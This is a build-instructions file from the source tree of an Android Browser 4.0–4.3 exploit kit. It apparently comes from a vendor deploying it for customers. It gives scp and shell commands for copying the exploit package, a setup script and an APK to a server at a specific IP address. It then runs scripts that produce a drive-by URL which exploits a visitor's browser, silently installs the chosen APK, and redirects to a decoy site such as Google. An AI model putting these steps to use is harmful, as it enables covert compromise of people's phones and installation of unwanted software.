src/ht-webkit-Android4-src/EDN_BUILD
----------- [ Android Browser 4.0.x-4.3.x remote2local exploit ] ---------------
------------------------ [ EDN Build instructions ] ----------------------------
The exploit building process will be streamlined with a new GUI in the
future, but in the meantime the mobile remote2root exploit can be
easily deployed manually.
EDN exploit building requires three files:
* android43_browser_remote.zip: The actual exploit.
* setup.sh: The setup script.
* installer.apk: The apk for a specific customer or demo.
-- [ Instructions ]
1] Copy the zip package and the setup script to
/root/android43_browser_remote, if it's not already there, e.g.,
$ scp -p -P 30090 android43_browser_remote.zip root@199.175.54.94:/root/android43_browser_remote/
2] Copy the setup script in the same directory, e.g.,
$ scp -p -P 30090 setup.sh root@199.175.54.94:/root/android43_browser_remote/
3] Copy your apk file anywhere on the server (if you want, the exploit
directory can be used), e.g.
$ scp -p -P 30090 installer.apk root@199.175.54.94:/root/android43_browser_remote/
4] Login, chdir to /root/android43_browser_remote and run
./setup.sh <webserver_dir> <ip> <redirect> <apk>
e.g.,
# cd /root/android43_browser_remote
# ./setup.sh cccccc 199.175.54.94 http://www.google.com ./installer.apk
this will create a new exploit instance at
http://<IP>/docs/<webserver_dir>/fwd which will install the provided
apk and redirect to the provided address after exploitation.
(http://199.175.54.94/docs/cccccc/fwd in the example)
--- [ Building manually using the EDN build script ]
1] Extract the package contents into a temp directory
2] Run the script (./build) like this:
./build <target_directory> <ip> <prefix> <redirect> <apk>
Where target_directory is the path where the files need to be stored
in the webserver file system and prefix is the URI compnent after the
IP address and before the fixed "/fwd" string.
As an example,
./build /var/www/files/cccccc 199.175.54.94 docs/cccccc
http://www.google.com ./installer.apk
will build the exploit in /var/www/files/cccccc which will be
accessible as http://199.175.54.94/docs/cccccc/fwd .
3] Set the necessary permissions (all .ini files need to be modified
or owned by apache)